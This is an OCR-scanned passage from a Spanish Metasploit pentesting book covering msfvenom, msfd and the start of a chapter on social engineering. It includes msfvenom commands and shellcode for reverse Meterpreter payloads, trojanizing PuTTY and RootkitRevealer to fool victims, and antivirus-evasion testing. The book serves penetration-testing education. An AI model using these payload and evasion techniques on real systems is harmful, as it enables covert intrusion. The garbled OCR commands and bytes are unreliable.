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Tras  ejecutar  la  apiicacion  maliciosa,  la  vlctima  visualiza  correctamente  dicha  herramienta,  pero  en 
segundo  piano  se  ha  lanzado  un  thread  el  cual  esta  ejecutando  el  payload.  Para  demostfar  esto,  se  ha' 
preparado,  mediante  el  uso  de  la  herramienta  rnsfcli,  el  exploit  multi/handler  con  el  En  de  recibir  last 
sesiones  inversas  de  Meterpreter  que  producen  las  ejecuciones  del  archivo  maliciosd.  En  la  imagen 
se  puede  visualizar  como  se  obtiene  una  sesion  de  Meterpreter,  lo  cual  otorga  el  control  remoCo  de 
la  maquina  vlctima  sin  levantar  sospecha  alguna. 

=[  metasploit  v3. 7.0- release  [ core : 3. 7  api:1.0J 
f ■  --  ’**■[  684  exploits  -  355  auxiliary 
!•  "al  217  payloads  *  27  encoders  -  8  nops 

Ihost  »>  192.168.1.39 
Iport  =>  4444 

payload  =>  windows/meterpreter/reverse  tcp 
{*]  Started  reverse  handler  on  192.168.1.39:4444 
!*]  Starting  the  payload  handler... 

[*}  Sending  stage  (749056  bytes)  to  192.168,1.38 

[*]0Heterpreter  session  1  opened  (192.168.1.39:4444  ->  192.168.1.38:1177)  at  2012-08-23  01:42:07 

Fig  5.39.  Obtencion  de  una  sesion  inversa  de  Meterpreter  mediante  ejecutable  sigiloso. 

Una  vez  que  se  Iw  demostrado  cdmo  se  obtiene  una  sesidn  de  Meterpreter,  mientras  que  el  usuario 
victuna  visualiza  la  pantalla  principal  de  la  apiicacion  Putty,  y  que  ademas,  su  solucion  antivirus 
no  detecta  tal  archivo  como  malicioso,  llega  el  momento  de  estudiar  los  resultados  de  los  motores 
antivirus.  Para  elio,  se  precede  a  la  subida  del  archivo  a  Virus  Total  y  se  analizan  los  resultados. 
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Fig  5.40:  Resultados  presentados  por  virus  total  para  el  archive  puttyCodificado.exe. 

Los  resultados  reflejan,  en  parte,  un  retroceso  en  la  evasion  de  algunos  antivirus.  Hay  que  tener  en 
ciienta  que  se  esta  dando  prioridad  al  aspecto  del  archivo,  antes  que  a  la  eficiencia  para  evadir  una 
solucion  antivirus.  Los  resultados  obtenidos  se  pueden  comparar  a  los  conseguidos,  practicamente 
sin  disponer  de  codificacion,  ya  que  la  mejora  ha  sido  m  inima. 

Hay  que  tener  en  cuenta  que  la  tecnica  de  la  plantilla  personalizada  sin  ejecucion  del  payload  m  un 
threads  mas  eftcienle  para  evadir  a  los  antivirus.  Utilizando  dicha  tecnica  con  el  mismo  ejecutable, 
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es  decir  la  herramienta  putty,  pero  sin  el  thread  sigiloso  se  obtienen  menos  cletecciones.  Si  se  puede 
verificar  el  motor  antivirus  de  que  disponen  las  victimas  se  puede  comprobar  en  Virus  Total  si  sedan 
detectados  o  no,  y  en  ese  caso  se  puede  elegir  una  u  otra  tecnica. 


5.  MslVenom:  Payload  y  evasion 

La  aplicacion  msfvenom  es  una  herramienta  que  aparecio  no  hace  demasiado  tieinpo  en  el  framework 
de  Metasploit.  Esta  herramienta  no  viene  por  defeclo,  por  ejemplo,  en  la  version  de  UackTrack  5.  Se 
puede  conseguir,  por  ejemplo,  en  la  version  BackTraek  5  R3. 

El  objetivo  de  esta  herramienta  es  unir  las  funcionalidades  de  msfpayload  y  msfencode  en  una  sola 
aplicacion.  Una  mejora  que  los  usuarios  no  tienen  en  cuenta  en  la  rnayona  de  las  ocasiones  es 
la  semantica  de  los  parametros.  Es  mas  sencillo  utilizar  una  herramienta  cuyos  parametros  tienen 
semantics,  como  por  ejemplo  el  caso  del  parametro  ~p.  En  esta  herramienta  se  puede  utilizar  un 
parametro  semantico,  es  decir,  -payload.  De  esta  manera,  el  usuario  puede  entender  facilmente  la 
funcionaiidad  que  la  herramienta  presents. 

Msfvenom  permite  erear payloads  para  utilizar  de  forma  independiente  en  los  exploits  que  cualquier 
usuario  puede  crear,  o  se  puede  utilizar  para  crear  archivos  ejecutables  para  sistemas  operativos 
como  Windows,  GNU/Linux  u  OSX.  La  funcionaiidad  es  justo  la  niisma  que  la  que  dispone  la 
herramienta  msfpayload,  salvo  que  estas  funcionalidades  pueden  codifiearse  automaticamente  con 
algun  algoritmo,  como  puede  ser  x86/shikata _ga_nai  o  x86/countdown,  entre  otros. 

Beneficios  del  uso  de  msfvenom 

Los  principales  beneficios  que  aporta  msfvenom  a  los  usuarios  del  framework  de  Metasploit  se 
enumeran  a  continuacion: 

-  El  potencial  de  dos  herramientas,  como  son  msfencode  y  msfpayload,  se  coucentra  on  una 
sola,  que  ademas  es  flexible  y  de  uso  intuitivo. 

-  Estandarizacion  de  este  tipo  de  herramientas  mediante  el  uso  de  msfvenom.  Con  esta 
aplicacion  el  usuario  dispone  de  un  estandar  para  la  generacion  de  payloads  y  ejecutables 
maliciosos  para  los  test  de  intrusion. 

-  El  rendimiento  ha  sido  mejorado  considerablemente.  La  velocidad  con  la  que  msfvenom 
trabaja  es  claramente  mas  alta  que  el  uso  de  msfpayload  y  msfencode  por  separado.  Eslo  es 
bastante  logico  debido  a  que  se  evita  el  paso  de  information  entre  distintos  procesos,  y  toda 
la  accion  es  realizada  por  el  mismo. 

-  Facii  aprendizaje.  Esta  herramienta  proporciona  una  interfaz  intuitiva,  mediante  el  uso  de 
parametros  semanticos,  con  lo  que  un  usuario  sin  conocimientos  previos  puede  realizar  sus 
pruebas.  Para  ei  auditor  o  usuario  avanzado  proporciona  una  herramienta  rapida  y  con  gran 
rendimiento. 
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Opciones  de  msfvenom 

La  herramienta  msfvenom  dispone  de  varias  opciones,  las  cuales  se  especiftcan  a  continuacion.  flay 
que  tener  en  cuenta  que  la  .funcionaiidad  de  la  aplicacion  puede  variar  en  funcion  de  las  opciones 
que  se  activen  o  se  configured  Para  visualizar  iodas  las  opciones  disponibies  con  la  herramienta  se 
puede  ejecutar  la  siguicnte  instruccion  msfvenom  -h.  .  '■ 


jrootQbt :  - 

#  msfvenom 

-h 

5 

Jsage:  /opt/metasploit/msf 3/jasfvenom  [options]  <var«val>  *  ; 

Dptions :  1 

'P.  - 

s 

-payload 

[payload] 

Payload  to  use.  Specify  a  or  stdln  to  use  custom  payload 

-1,  - 

-list 

[inoduletype] 

List  a  module  type  example:  payloads,  encoders,  nops,  all 

-n,  - 

-nopsled 

(length] 

Prepend  a  nopsled  of  [length]  size  on  to  the  payload 

-f,  - 

-  format 

[format] 

Output  format  (use  - -help- formats  for  a  li.stl 

*e,  - 

-encoder 

[encoder] 

The  encoder  to  use 

-a,  - 

-arch 

[architecture] 

The  architecture  to  use 

.  - 

-platform 

[platform] 

The  platform  of  the  payload 

-s,  - 

-space 

[length] 

The  maximum  size  of  the  resulting  payload 

-b.  - 

-bad -chars 

[list] 

The  list  of  characters  to  avoid  example:  '\x00\xff 

-i,  - 

-iterations 

[count] 

The  number  of  times  to  encode  the  payload 

-c,  - 

-add-code 

[path] 

Specify  an  additional  Win32  shellcode  file  to  include 

-x,  - 

-template 

[path] 

Specify  a  custom  executable  file  to  use  as  a  template 

-k,  - 

-keep 

Preserve  the  template  behavior  and  inject  the  pavload  as  a  n 

ew  thread  i 

*0,  - 

-options 

List  the  payload's  standard  options 

-h,  - 

-help 

Show  this  message 

- 

-help-formats 

List  available  formats 

Fig  5.41 :  Opciones  disponibies  con  la  herraniicnla  msfvenom 


En  la  siguiente  tabla  se  especifica  la  utilizacion  de  los  distintos  parametros  y  la  nomenelatura  de 
estos,  tanto  en  formato  reducido  como  en  formato  semantico. 


Parametro 

De  scripciou 

-p  |  -payload 

Se  debe  especificar  el  payload  que  se  quiere  utilizar 

-1 1  —list 

Se  debe  especificar  el  tipo  de  mbdulos  que  se  quiere  iislar,  por  ejemplo 
encoders,  payloads,  etcetera 

-n  |  -nopsled 

Especifica  el  tamano  sobre  el  payload  1 

-f  j  —format 

Se  debe  especificar  el  formato  de  salida,  por  ejemplo  executable,  raw,  etcetera 

-e  |  -encoder 

Especifica  el  encoder  que  requiere  utilizar,  por  ejemplo  x86/coun(down.  Esta 
funcionaiidad  es  identica  en  msfencode 

-a  |  -arch 

Se  especi  fica  la  arquilectura  donde  se  ejecutara  el  payload 

-s  j  -space 

Especifica  el  tamano  maximo  que  debe  tener  el  payload 

-b  |  -bad-chars 

Especifica  ei  listado  de  caracteres  que  deben  evitarse  en  la  creacion  del 
payload,  por  ejemplo,  para  evitar  los  bytes  null  ‘\ xQO’ 
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-i  |  -iterations  Especifica  el  numero  de  iteraciones  que  ejecutara  e)  encoder 

-k  |  - keep  Especifica  que  el. payload se  ejecutara  en  un  thread.  Este  parametro  implement?. 

la  tecnica  de  ejecutable  coil  “plantilla  personalizada  sigilosa” 

-x  j  -template  “Especifica  u-na  plantilla  personalizable.  Este  parametro  impfementa  la  tecnica 
del  ejecutable  con  plantilla  personalizada 

-c  I  -- add-code  1'ermite  anaclrr  un  ejecutable  personalizado  - - 

-o  |  -options  Lista  las  opciones  de  los  payloads 

Tabia  5.0  J :  Opciones  de  msfvenom. 


Creadon  de  shellcode  codifieado 

La  creacion  de  un  shellcode  codifieado  se  simplifies  mucho  con  la  utilizacion  de  msfvenom.  Como 
ejemplo  se  propone  la  utilizacion  de  los  parametros  -payload,  -encoder,  -iterations  y  -bad-chars. 

En  primer  lugar  se  especifica  que  tipo  de  payload  se  quiere  utilizar,  por  ejemplo,  windows/ 
meterpreter/reversejep.  Con  el  parametro  -encoder  se  indicat'd  que  algoritmo  se  desea  utilizar 
para  lievar  a  cabo  la  codificacion  del  codigo,  en  buses  de  la  evasion  de  los  antivirus.  Para  el  ejemplo 
se  utilizara  el  encoder  x86/shika!a_gajtai.  Con  el  parametro  - bad-chars  se  indica  la  lists  de  bytes 
que  no  se  quieren  generar  en  el  proceso.  Ademas  se  evitard  crear  codigo  que  contenga  el  byte  ‘bdlO '. 

rootgbt:-#  iiisfvenou*  --payload  windows/meterpreter/reverse  tep  - -encode r~x86/shikata  qa  nai  - -TteT 
ations  5  --bad-chars  ‘\x00’  lhost*192. 168. 1.39  lport=4444  ~  ~ 

1*1  x86/shikata_ga_nai  succeeded  with  size  317  (iteration=l) 

1*1  x86/shikata_ga_nai  succeeded  with  size  344  (iteration^) 

[*]  x86/shikata_ga  nai  succeeded  with  size  371  (iteration^) 

[*]  x86/shikata_ga_nai  succeeded  with  size  398  (iteration**) 

1*1  x86/shikata_ga_nai  succeeded  with  size  425  (iteration^) 
auf  = 

u\xbd\x86\x2f\x7a\x28\xda\xcl\xdg\x74\x24\xf4\x5f\x29\xc90  + 
,,\xbl\x64\x83\xef\xfe\x31\x6f\xl0\x03\x6f\xl0\x64\xda\xa0*  + 
"\xec\xbl\x5l\x71\xl9\xfa\xed\x89\x6f\xb2\x49\x59\xb9\xfb0  + 
,‘\x37\xac\x61\xel\x44\x26\x6d\xl6\xl3\xal\x6c\x9a\x89\x8e"  r 
u\x84\xa2\x31\xcf\xf3\xcb\xbf\x34\xa7\x2f\xGl\x78\x74\xBe"  + 
"\xbd\xa2\x37\x2c\xb3\x0a\x7f\xb3\x6e\xe4\xa4\x46\x88\x69"  + 
“\xfc\x09\x6B\x04\x5e\x59\xcf\xf0\xa8\x2e\x56\x80\x55\x41"  + 
’'\x27\x79\x0a\x4e\x0f\xf5\xef\xe6\xf3\xc0\xfc\xa8\x3d\xd8"  + 
"\x79\x97\xd3\xl9\xdd\x0c\x62\xc3\x79\x97\xbf\x78\x82\x08“  + 
"\x42\xc6\xl9\x4e\x5f\xcd\xdf\x94\xlG\XB7\x65\xb8\xfb\x54"  + 
"\x68\x93\x07\x0e\x68\x67\xf5\xb9\x38\xcd\x88\xae\x27\x44“  + 
"\xb9\x54\xf2\x67\x0c\x66\x5B\x07\x34\xff\xlf\x7a\x5f\x97*  + 
',\x26\x52\xa7\x9a\x22\xi3\x26\xd9\x57\xe6\xlc\xb7\xfa\xlbB  + 
H\xec\x40\x5a\xcd\xbc\xbd\xd2\xfb\xdd\x9f\x5c\xa4\x6a\xf5“  + 
"\x90\x2d\x50\x57\x05\x9e\xde\xec\xfb\xB8\xba\x6a\xf5\xb6“  + 
M\x5c\x32\xd9\xf7\x5c\x61\x?b\x87\x50\xal\x3b\x4b\x96\xlc“  + 
,1\xe5\xle\xa5\xl8\x89^xl8^xld\x42\xd3\x34\x27\xe4\xcd\x0b,'  + 
"^xcd\xab\x61\x32\x*b^x2e^xB9\xec\x3a\xla^xbd\x21\xl3\x^d■l  + _ 

Fig  5.42:  Generation  de  shellcode  codifieado  sin  bytes  nulos. 


PoC:  Creadon  de  ejecutable  codifieado  con  msfvenom 

En  esta  prueba  de  concepto  se  creara  un  ejecutable  para  sistemas  Windows  con  la  herramienta 
msfvenom.  Ademas,  se  probard  mediante  el  uso  de  Virus  Total  si  el  ejecutable  es  efectivo  en  la 
evasion  de  antivirus.  | 

Se  tililizard  la  tecn  ica  de  la  plantilla  personalizada  para  crear  ei  ejecutable,  ya  que  como  se  ha  vistj 
anteriormente  se  consigtie  evitar  a  un  mayor  numero  de  antivirus.  No  se  utilizara  la  tecnica  del 
thread  para  ianzar  el  payload. 

El  ejecutable  que  se  utilizara  como  plantilla  es  la  herramienta  RootkitRevealer  de  Sysinternals. 
Esta  herramienta  permite  detectar  posibles  rootkits  ejecutandose  en  un  sistema  Windows  Lo  que 
se  pretende  es  utilizar  la  irnagen  de  una  aplicacion  que  es  utilizada  para  detectar  amenazas  para* 
inyectar  un  payload  y  convencer  al  usuario  vlctima  de  que  la  ejecute. 


fig  5-43;  Archivo  ejecutable  roolkilReveaIerCodifrcaclo.exe. 


Para  crear  el  ejecutable  con  la  plantilla  de  RootkitRevealer  se  utilizara  el  parametro  -template 
para  indiear  la  rata  donde  se  encuentra  dicho  ejecutable.  En  la  irnagen  se  puede  visualizar  como 
se  utilizan  los  parametros  comunes  que  se  utilizan  en  msfpayload  y  en  msfencode,  todo  ello  en  una 
imica  herramienta. 


|root@bt:~#  msfvenom  --payload  windows/meterpreter/ reverse  tep  --format  exe  -encoder  x8S/sbikata 

jl’J  x86/shikata_gajiai  succeeded  with  size  317  (iteration*!) 

[*]  xSG/shikatajjanai  succeeded  with  size  344  (iterations) 

[*]  x86/shikata_ga_na.i  succeeded  with  size  371  (iteration**) 
jt^l  x86/shikata_ga_nai  succeeded  with  size  398  (iteration=4) 
jf*]  xB6/shikataja  nai  succeeded  with  size  425  jiteration«5) 

![*3  x86/shlkata_ga_nai  succeeded  with  size  452  (iteration=6) 

|i*J  xB5/shikata_ga_nai  succeeded  with  size  479  (iteration*?) 

If*]  x85/shikata_ga_nai  succeeded  with  size  506  (iteration-8) 
j[*]  x8S/shikata_ga_nai  succeeded  with  size  533  {iteration*9} 

|[*]  x86/ shikata^gajiai  succeeded  with  size  56B  (iteration=l0) 

Fig  5.44:  Creacion  de  archivo  ejecutable  con  msfvenom. 


Tras  crear  el  ejecutable  y  distribuirlo  a  las  posibles  vfetimas  serla  conveniente  comprobar  el  estate 
de  Jos  antivirus  respecto  ai  archivo  malicioso.  Se  procede  a  la  subida  y  analisis  del  archivo  por  parte 
de  Virus  Total.  1 


Los  resultados  mdican  que  la  mitad  de  los  antivirus  que  se  encuentran  en  Virus  Total  detectan  el 
archivo.  Ei  porcentaje  de  exito  serla  por  io  tanto  de  un  50%  en  este  case.  Ya  se  habta  comprobado 

en  e  apartado  dedicado  a  msfencode  como  la  tecnica  de  plantilla  personalizada  devolv.a  los  mejores 
resultados.  J 


Fig  5.45:  Rcsu Ratios  obtcnidos  tie  virus  total  tie  la  cieacion  tie  ejeculable  con  msfvenom. 


6.  Msfd:  Gestion  remota 

Esta  aplicacion  es  un  demonio  o  servicio  que  ofrece  la  posibilidad  de  conectarse  de  manera  remota 
al  framework.  Hay  que  tener  en  cuenta  que  cuando  varios  clientes  se  conectau  a  este  servicio, 
realmente  estan  utilizando  la  misma  instaneia  del  framework.  Msfd  proporciona  a  los  pentesters  de 
un  servicio  global  que  se  puede  utilizar  y  ofrece  el  potencial  de  Metasploil  de  manera  independiente 
a  la  maquina  que  se  este  utilizando.  Simplemente  con  disponer  de  una  conexion  a  internet  o  a  una 
red  interna,  se  puede  utilizar  el  potencial  y  flexibilidad  del  framework. 

Para  obtener  ayuda  en  el  uso  de  la  herramienta  msfd  se  dispone  de  la  instruccion  msfd-h.  Con  esta 
instruccion  se  obtiene  informacion  del  uso  y  las  posibilidades  que  esta  ofrece.  Las  opciones  se 
estudiaran  a  continuacion  y  se  ilustrara  mediante  el  uso  de  ejempios  las  posibilidades  reales  de  la 
aplicacion. 

Opciones  de  msfd 

La  aplicacion,  en  principio,  parece  menos  configurable  de  io  que  realmente  es.  Se  pueden  realizar 
diversas  tareas  como  fortificar  la  conexion  entre  el  auditor  y  el  framework,  configurer  el  puerto  que 
se  desee,  implementar  una  lista  de  hosts  desde  los  que  se  puede  coneclar  a  Metasploil ,  etceteia.  bn 
la  siguiente  tabla  se  muestran  las  distintas  opciones  y  funcionalidades  que  ofrece  msfd. 

Parametro  _  Description _ 

Se  especifica  una  lista  con  las  direcciones  IP  desde  las  que  se  permiten  realizar  : 
conexiones  al  framework. 

-a  Asocia  la  direccion  IP  proporcionada  a  la  instaneia  del  framework. 
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Se  especiftca  una  lista  con  las  direcciones  IP  desde  las  que  no  se  permiten  realizar 
conexiones  a \  framework. 

Ejecuta  ei  servicio  en  primer  piano. 

Asocia  un  puerto  a  la  instaneia. 

Ut  iliza  SSL  para  fortificar  la  conexion. 

Tabla  5.02:  Opciones  de  msfd. 

Como  curiosidad  puede  llamar  la  atencion  no  disponer  de  una  autentieacion  para  utiiizar  framework 
en  remoto,  Aunque  pueda  parecer  extrano,  si  se  requiere  fortificar  el  uso  ikl  framework  es  mejor 
utilizar  protocoios  como  SSH,  Secure  SHell,  para  proteger  tanto  el  canal  como  el  acceso  a  este. 


PoC:  Conexion  en  un  puerto  personalizado  y  preparando  exploit 

En  esta  prueba  de  concepto  se  utilizan  dos  maquinas  bien  dilerenciadas.  En  la  primera  se  esta 
ejecutando  una  distribucion  de  BackTrack  5  donde  se  configurara  el  servicio  msfd  de  manera 
person aiizada.  La  segunda  maquina  es  un  Windows  XP,  aunque  este  hecho  no  es  relevante  ya  que 
funcionarla  exactamente  igual  en  una  version  como  Windows  7.  En  la  maquina  con  Windows  XP  se 
conectara  con  el  servicio  msfd  a  traves  de  la  herramienta  Net  cat,  la  cual  es  conocida  en  el  mundo  de 
la  administracion  y  la  seguridad  como  la  “navaja  suiza” 

En  primer  lugar  se  eonfigura  la  aplicacion  msfd  con  los  siguientes  parametros: 

-  El  servicio  se  ejecutara  en  segundo  piano.  Este  hecho  ya  viene  configurado  por  defecto, 
si  se  quisiera  realizar  la  ejecucion  en  primer  piano,  bloqueando  la  shell  de  este  modo,  se 
ejecutarla  el  parftmetro  -f. 

-  El  servicio  aplicara  una  lista  con  direcciones  IP  donde  se  especificaran  las  que  no  pueden 
conectarse  remotamente. 

-  El  servicio  aplicara  una  lista  con  direcciones  IP  donde  se' especificaran  las  que  si  se 
pueden  conectar  remotamente. 

-  El  sei*vicio  se  ejecutara  a  la  escucha  en  el  puerto  9000. 

-  EI  servicio  se  enlazara  con  la  direccion  IP  192.168.1.40  que  es  la  que  pertenece  a  la 
maquina  con  BackTrack  en  esta  prueba  de  concepto. 


En  la  imagen  se  puede  visualizar  como  se  eonfigura  la  aplicacion  y  esta  se  ejecuta  en  segundo  piano 
o  background. 


jroot@root:~#  msfd  -p  9B00  -A  192.168.1.35,192.168.1.36  -0  192.168.1.34  -a  192.168.1,40 
[*]  Initializing  msfd... 

[*]  Running  msfd.. . 
root@root:-# 


Fig  5.46:  Configuracion  y  ejecucion  de  la  aplicacidn  msfd. 
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lias  dejar  el  servicio  preparado,  la  maquina  con  Windows  XP  y  la  aplicacion  Neicat  dhponible 
realizara  ia  conexion.  Para  ello,  simplemente  se  debe  ejecutar  la  instruccion  nc.exe  <direccion  JP> 
<puerto> ,  en  este  caso  nc.exe  192.168.1.40  9000.  Se  puede  utilizar  el  parametro  — v  para  visualizar 
las  operaciones  que  esta  realizando  la  herramienta. 

Si  todo  sucede  correctamente  se  podra  visualizar  el  banner  de  Metasploit  en  la  linea  de  comandos 
de  Windows  y  se  dispondra  de  la  consola  del  framework  de  manera  remota. 


Fig  5.47:  Conexion  remota  ai  framework  mediante  el  uso  de  Neicat. 


Una  vez  que  se  d  ispone  del  control  de  la  instancia  del  framework  de  manera  remota,  los  comandos 
son  exactamente  iguales  que  si  se  estuviera  en  local.  Por  eso,  para  cargar  el  modulo  ex ploitfmilti/ 
handler  se  utiliza  el  contando  use.  Como  se  puede  visualizar  en  la  imagen  se  utilizan  ios  mismus 
pasos  para  la  configuracion  del  modulo. 


oxyloit/iiiwlti/hnRdler  ,  ?  •  --a 

DftOT’Iftn;  ^xplfiifc<0S©0lianUIei^ >®f3>A  sol;  PfiVLOrtO  oindoui;/iTi<‘tei'pi,ol,'oi*/re6ei*i;e 
PHXliOftD!"?  rnndous/jnetoj'iwoteiv'royeose  ten 

©&>-  sett  --MOST  "'r  •  ' 

i06T-,:«jf  .192 .168  .US  a  .  \  - 

@3>.  show  options,  -  . 

|tijLliUjl6  options  <  o  «p  lo  it /mu It  i/haml  le  v  >  :  ’ 

' '  - .'Current  Setting  Required  Description  ' ' '  • .  ^  . ‘j 

opt  ions  <winxlmis/nt?t;«iweter/reverse^tcp>s 

p-  Matue1'  Current- i>ett; in g  Required  Description  .  •  •*  ; 

ne  F^IFFIIHC  process  yen  Exit  technique;  seh,..  thread,  -proces 

I.H0ST  192.Jl68-il-.35 
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Fig  5.48:  Configuraci6n  exploil/nwlli/handler  a  traves  de  Neicat. 


7.  Manipulation  de  memoria 

Las  herramientas  disponibles  en  c\  framework  para  la  manipulacion  y  analisis  de  memoria  se  centran 
en  el  desensamblaje  dc  las  aplicaciones.  ^Cuai  es  ei  objetivo  de  este  tipo  de  aplicaciones?  El  flu  es 
estudiar  el  codigo  en  ensamblador  de  dichas  aplicaciones,  poder  visualizar  y  conocer  variables  V  las 
posiciones  en  memoria  de  estas  e  instrucciones  de  la  aplicacion. 

bstas  acciones  son  realizadas  normalmente  por  los  mvestigadores  de  seguridad  en  busca  de 
vulnera bi I idades  en  las  aplicaciones.  El  codigo  en  ensamblador  es  realmente  el  que  es  ejecutado, 
es  por  ello  que  si  ei  investigador  !o  conoce  puede  determinar  en  cju€  lugar  puede  manipuiar  el  E1P, 
punlero  de  instruccion,  de!  cual  ya  se  comento  en  el  apartado  dedicado  a  imfpayload.  En  definitiva 
se  busca  obtener  vulnerabiiidades  de  tipo  buffer  overflow. 

El  framework  dispone  de  las  herramientas  msfelfscan  y  msfpescan  para  estudiar  y  analizar  el  codigo. 
Existen  otras  herramientas  compatibles  con  las  acciones  que  realizan  las  mencionadas  anteriormente. 
como  son  fmdjmpl,  windbg  o  memdump. 


Msfelfscan  y  msfpescan 

La  herramienta  msfelfscan  permile  escanear  y  analizar  aplicaciones  ELF  en  sistemas  GNU/Linux. 
Por  otro  lado  la  herramienta  msfpescan  permite  escanear  o  analizar  ficheros  ejecutables  y  DLLs  de 
sistemas  Windows.  Se  pneden  encontrar  instrucciones  en  ensamblador  sobre  una  imagen  de  memoria 
de  la  aplicacion. 

Para  obtener  una  imagen  de  memoria  de  una  aplicacion,  esta  debe  ser  janzada  en  el  sistema  objeto, 
ya  sea  Windows  o  GNU/Linux.  Una  vez  se  conoce  el  PID,  identificador  del  proceso,  se  pueden 
ejecutar  herramientas  como  Memdump,  mencionada  anteriormente  para  crear  la  imagen  de  la 
memoria  del  proceso.  Tras  haberse  realizado  el  volcado  de  memoria  anterior  se  puede  analizar  con 
las  herramientas  msfelfscan  o  msfpescan. 

Estas  herramientas  suponen  un  conocimiento  en  ingenieria  inversa  importante  y  requiere 
conocimientos  basicos  sobre  este  tipo  de  arte.  "  • 
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1.  Ingenieria  social 

La  ingenieria  social  es  el  medio  por  el  que  los  usuarios  nmliciosos  o  delincuentjs  compulacionales 
nmnipuian  a  ios  usuarios  para  lograracceso  ilicito  a  la  informacion,  credenciales,  escalar  privilegios, 
etcetera. 

El  principio  de  la  ingenieria  social  es  que  la  parte  mas  debil  de  todo  sistema  es  eljusuario,  es  por  eilo 
que  concienciar  a  estos  debe  ser  una  de.  las  prioridades  de  toda  empresa.  Los  medios  que  el  ingeniero 
social  utiliza,  generalmente,  son  el  teiefono  e  Internet.  En  cierto  tipo  de  auditorial  tambien  puede  ser 
val  ido  hacerse  pasar  por  otros  companeros  de  trabajo,  con  el  fi  n  de  sacar  el  maxi  mo  de  informacion. 

El  ingeniero  social  puede  utilizar  tecnicas  como  la  suplantacidn  de  webs,  envto.de.  mails  con 
peticiones  de  recordatorios  de  contrasenas,  envio  de  SMS  falsos  con  enlaces  a  paginas  webs  bajo 
el  control  del  ingeniero  social,  la  cual  suplanta  a  otra  web  conocida,  etcetera.  Todas  estas  tecnicas 
estan,  hoy  en  dta,  muy  optimizadas,  lo  cual  hace  que,  en  aigunos  casos,  diferenciar  la  web  falsa  o 
phishing  sea  complicado  para  un  usuario. 

El  usuario,  generalmente,  tiene  un  comportamiento  predecible  o  acciones  automatizadas  cuando  se 
enfrenia  a  ciertas  paginas,  por  lo  que  si  no  se  toman  las  medidas  adecuadas,  este  puede  ser  estafado 
via  Internet,  por  ejemplo  con  un  phishing  de  la  pagina  web  de  su  banco,  en  la  que  tras  introducir 
las  credenciales,  se  redirija  al  original  o  se  alerte  al  usuario  de  que  el  sitio  web  no  se  encuentra 
disponible  en  esc  momento. 

Uno  de  los  ataques  mas  comunes,  y  a  la  vez  mas  simples,  y  efectivos  es  enganar  a  un  usuario  para  que 
piense  que  un  sistema  le  esta  solicitando  su  contrasena  para  ciertas  acciones.  Muchos  de  los  usuarios 
de  Internet  reciben,  frecuentemente,  mensajes  que  le  solicita  este  tipo  de  informacion,  credenciales 
de  cuentas,  de  bancos,  tarjetas  de  credito,  con  el  motivo  de  crear  una  cuenta,  por  ejemplo.  Este  tipo 
de  ataques,  como  se  menciono  anteriormente,  se  denominan  phishing  y  es  una  plaga  en  internet. 
Actualmente,  los  bancos  y  propietarios  de  este  tipo  de  sistemas  advierten  periodicamente  a  los 
usuarios  para  que  no  revelen  informacion  sensible,  como  tarjetas  de  credito,  credenciales,  etcetera, 
por  Internet,  ya  que  este  tipo  de  informacion  nunca  se  solicitara  por  este  medio. 


MetasploU  para  Pentesiers 

Existen  olros  metodos  propios  de  la  ingenieria  social  mas  clasica  como  es  la  revelation  de  las 
contrasenas  a  cambio  de  otros  objetos.  Se  realizb  esta  prueba  en  una  oficina  de  Londres  donde  un 
alto  porcentaje  de  los  empleados  revelaron  su  contrasena  a  cambio  de  un  simple  boligrafo. 

Giro  de  los  metodos  clasicos  de  la  ingenieria  social  es  el  uso  de  los  archivos  adjuntos  en  emails,  en 
los  que  se  ofVece  lotos,  aplicaciones,  documentos  oflmaticos  ios  cuales  cjecutarau  codigo  maliciosc, 
con  el  objetivo  de  troyanizar  la  maquina  de  la  victima.  En  tal  caso,  dicha  maquina  puede  serutilizada 
para  format  parte  de  una  botnet,  y  poder  asi  enviar  mails  a  modo  de  spam,  entre  otras  acciones 
maliciosas.  En  realidad,  se  necesita  que  el  usuario  ejecute  eslos  archivos  adjuntos,  pero  es  cierto 
que  miichos  de  ios  usuarios  de  Internet  abren  a  degas  los  archivos  que  retiben  en  sus  correos 
electron  icos,  haciendo  fuerte  este  metodo  de  ataque. 

H  istoricainente,  como  se  puede  ver  en  ciertas  peliculas  de  hackers  la  ingenieria  social  presenta  su 
cara  mas  Visible  en  la  manipulation  cara  a  cara  para  la  obtencion  de  acceso  a  los  sistemas.  Un  pusible 
ataque  dirigido  puede  comenzar  con  el  proceso  de  ingenieria  social,  es  decir,  el  conocimiento  de  la 
victima.  ! 

i  : 

La  defensa  contra  la  ingenieria  social  es  el  sentido  comun,  y  concienciar  a  los  usuarios  de  los 
sistemas  de  la  information  de  que  acciones  se  pueden  pedir  a  traves  de  los  medios  telematicos, 
como  mahejar  el  correo  electronico,  no  fiarse  de  correos  sospechosos,  navegacion  segura,  evitar  los 
enlaces  acortados  o  enlaces  sospechosos,  utilizacibn  de  plugins  que  ayuden  a  la  navegacion  segura, 
etcetera.  I 
f; 

Posibiembnte  el  ingeniero  social  mas  famoso  de  la  breve  historia  de  la  informatica  es  Kevin  Mitnick, 
al  dial  se|  le  hizo  una  pellcula  sobre  su  vida.  Segun  Kevin  Mitnick  la  ingenieria  social  se  basa  en 
cuatro  principios  que  se  enumeran  a  continuacion: 

-  |  Todo  ei  mundo  quiere  ayudar. 

-  !  El  primer  movimiento  es  siempre  de  confianza  hacia  el  otro  usuario. 

-  Al  ser  iuimano  no  le  gusta  decir  no. 

-  A  todo  el  tnundo  le  gusta  que  le  alaben. 

2.  iQue  es  y  que  propone? 

SET  o  Social  Engineer  Toolkit  es  un  script  que  proporciona  al  auditor  un  conjunto  de  herramientas 
relacionadas  con  la  ingenieria  social.  Este  conjunto  de  herramientas  se  integra  con  MetasploU  para 
realizar  ingenieria  social  y  la  intrusion  en  los  sistemas  remotos. 

SET  ofrece  una  aplicacion  que  centraliza  todas  las  funcionalidades  necesarias  para  realizar  ingenieria 
social  a  traves  de  medios  telematicos,  todo  para  realizar  pirateria  de  la  mente  humana.  El  proposito 
principal  de  SET  es  aportar  a  la  comunidad  y  a  los  auditores  la  posibilidad  de  utilizar  pruebas 


Capiiiilo  VI,  Ingenieria  social  con  SET 


basadas  en  la  ingenieria  social  para  obtener  resultados  y  comprobar  la  conciencia  de  los  empleados 
de  una  empresa.  M  | 

El  conjunto  de  herramientas  que  forman  SET  atacan  debilidades  humanas,  las  cuales  aprovechan  la^ 
curiosidad  de  los  usuarios,  credibilidad  o  avaricia.  Este  tipo  de  ataques,  como  se  podra  estudiar  en! 
